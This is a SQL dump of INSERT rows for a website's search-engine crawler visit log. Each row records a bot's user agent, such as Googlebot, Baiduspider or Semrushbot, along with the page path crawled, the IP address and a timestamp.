INSERT INTO `ey_weapp_spider_visit` VALUES ('95197', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/432.html', '66.249.79.108', '1660666318', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95217', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/15.html', '66.249.79.110', '1660677987', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95200', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/359.html', '66.249.79.110', '1660667574', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95203', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_46.html', '185.191.171.1', '1660669417', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95199', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_44.html', '185.191.171.12', '1660666959', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95209', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/344.html', '66.249.79.112', '1660673268', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95223', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/contact/', '185.191.171.2', '1660682360', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95230', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '27.158.148.127', '1660688696', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95272', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/212.html', '116.179.32.27', '1660717871', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95278', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/181.html', '185.191.171.13', '1660722171', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95471', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/462.html', '66.249.79.112', '1660837168', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95277', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.110', '1660722001', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95283', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.40', '1660723582', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95281', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/19.html', '116.179.32.27', '1660723414', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95292', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/57.html', '66.249.79.110', '1660730353', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95456', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660831180', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95457', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/383.html', '114.119.151.155', '1660831584', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95293', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_13/', '114.119.151.155', '1660730561', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95295', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/91.html', '114.119.151.155', '1660733969', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95296', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/193.html', '185.191.171.20', '1660734173', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95297', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/list_4_2/', '114.119.151.155', '1660734747', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95453', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/106.html', '114.119.151.153', '1660830099', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95454', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_20/', '114.119.151.153', '1660830386', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95298', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/czb/', '185.191.171.34', '1660736001', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95299', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.203', '1660736319', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95300', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/440.html', '185.191.171.11', '1660736673', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95302', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/490.html', '114.119.151.155', '1660737124', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95301', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/tonghua.html', '114.119.151.155', '1660736976', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95303', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.40', '1660737761', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95305', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660738848', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95309', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/171.html', '116.179.32.113', '1660742871', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95446', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/115.html', '116.179.32.176', '1660825059', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95452', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/hangyexinwen/list_18_10', '114.119.151.153', '1660828904', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95311', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bcxw/list_19_6/', '185.191.171.33', '1660744301', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95321', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/340.html', '185.191.171.35', '1660750891', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95333', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.110', '1660756330', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95341', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_8/', '114.119.151.155', '1660760432', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95338', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/120.html', '114.119.151.155', '1660758389', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95342', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/215.html', '66.249.79.110', '1660761417', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95445', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/115.html', '185.191.171.1', '1660824433', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95348', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1660764389', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95349', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/taizhong.html', '114.119.151.153', '1660765499', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95353', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.135', '1660767581', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95360', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/333.html', '17.121.113.150', '1660771471', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95350', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/163.html', '185.191.171.44', '1660765631', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95373', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/247.html', '185.191.171.38', '1660779380', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95378', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_27/', '116.179.32.211', '1660782782', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95402', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/200.html', '216.244.66.194', '1660799568', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95404', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/445.html', '114.119.151.153', '1660799823', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95411', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/list_4_3/', '114.119.151.153', '1660801391', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95414', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljwd/list_20_6/', '114.119.151.155', '1660801662', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95423', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/113.html', '185.191.171.9', '1660807063', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95421', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/364.html', '185.191.171.17', '1660805122', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95426', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/398.html', '207.46.13.59', '1660808493', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95442', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_19.html', '185.191.171.12', '1660823517', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95451', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_39/', '185.191.171.45', '1660828289', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95447', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.108', '1660825391', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95448', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/2_6.html', '185.191.171.8', '1660825454', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95449', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/rikaze.html', '114.119.151.155', '1660826715', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95459', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/47_2.html', '185.191.171.15', '1660831974', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95464', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.108', '1660833333', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97797', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/167.html', '66.249.79.110', '1661894458', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97796', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/59.html', '66.249.79.108', '1661894091', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95707', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.144', '1660962700', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95709', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/contact', '185.191.171.43', '1660963539', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97770', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/345.html', '66.249.79.112', '1661888955', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95706', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/328.html', '116.179.32.139', '1660962690', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95705', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_14.html', '185.191.171.38', '1660961868', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95702', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/290.html', '185.191.171.3', '1660961230', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95701', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/238.html', '114.119.151.153', '1660961100', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95717', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/219.html', '114.119.151.155', '1660966275', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95699', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/209.html', '185.191.171.17', '1660959748', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95700', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_6.html', '116.179.32.47', '1660960153', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97999', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.110', '1661995853', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95698', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/253.html', '185.191.171.23', '1660959679', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95696', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/zys.html', '114.119.151.155', '1660959210', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95697', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/340.html', '185.191.171.1', '1660959515', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98007', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/368.html', '66.249.79.110', '1661998380', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98004', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/77_2.html', '185.191.171.16', '1661996914', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95718', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_35.html', '220.181.108.83', '1660966498', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96368', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/135.html', '114.119.151.153', '1661276565', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95536', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/44_9.html', '185.191.171.25', '1660876416', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95544', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/92.html', '114.119.151.155', '1660883233', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95541', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/shizuishan.html', '114.119.151.155', '1660879934', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96372', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '103.43.70.250', '1661280603', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95534', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_42/', '216.244.66.194', '1660875606', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95560', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/98_4.html', '185.191.171.26', '1660895087', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95533', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/213.html', '116.179.32.51', '1660875403', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95532', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/318.html', '114.119.151.155', '1660875392', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95563', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/496.html', '116.179.32.89', '1660899951', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95529', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/472.html', '207.46.13.215', '1660874227', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95528', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/90.html', '185.191.171.13', '1660873270', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95527', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_15.html', '185.191.171.9', '1660871145', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95526', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/164.html', '220.181.108.104', '1660870494', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95530', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/160.html', '185.191.171.25', '1660875205', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95525', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1660868564', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95524', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.112', '1660867358', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95519', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/155.html', '114.119.151.153', '1660864350', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95520', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.146', '1660864393', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96376', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.108', '1661283131', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95566', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/104.html', '114.119.151.155', '1660901495', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95518', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660864158', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95572', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_17', '114.119.151.155', '1660902404', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95517', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/jiaruwomen/', '185.191.171.40', '1660863716', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95574', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/477.html', '114.119.151.155', '1660902678', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95577', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/changjianwenda/list_20_6/', '114.119.151.155', '1660903084', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95578', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/suz.html', '114.119.151.155', '1660903220', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95494', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/syss.html', '114.119.151.153', '1660855579', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95496', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1660855888', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95594', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/97.html', '220.181.108.167', '1660916311', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95490', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/315.html', '66.249.79.108', '1660853886', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95482', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_8/', '220.181.108.144', '1660846413', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95498', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/zzs.html', '114.119.151.153', '1660856746', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95480', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_15.html', '220.181.108.92', '1660844448', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95481', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/81.html', '185.191.171.19', '1660845585', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95611', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.112', '1660926467', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95759', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_9.html', '220.181.108.145', '1660986951', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95762', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/120.html', '185.191.171.13', '1660988960', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95836', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/184_3.html', '185.191.171.8', '1661048724', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95839', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/81.html', '185.191.171.36', '1661051342', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95848', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1661057276', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95840', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/case/list_4_2/', '116.179.32.36', '1661051597', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96354', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/5.html', '220.181.108.104', '1661270701', '0');
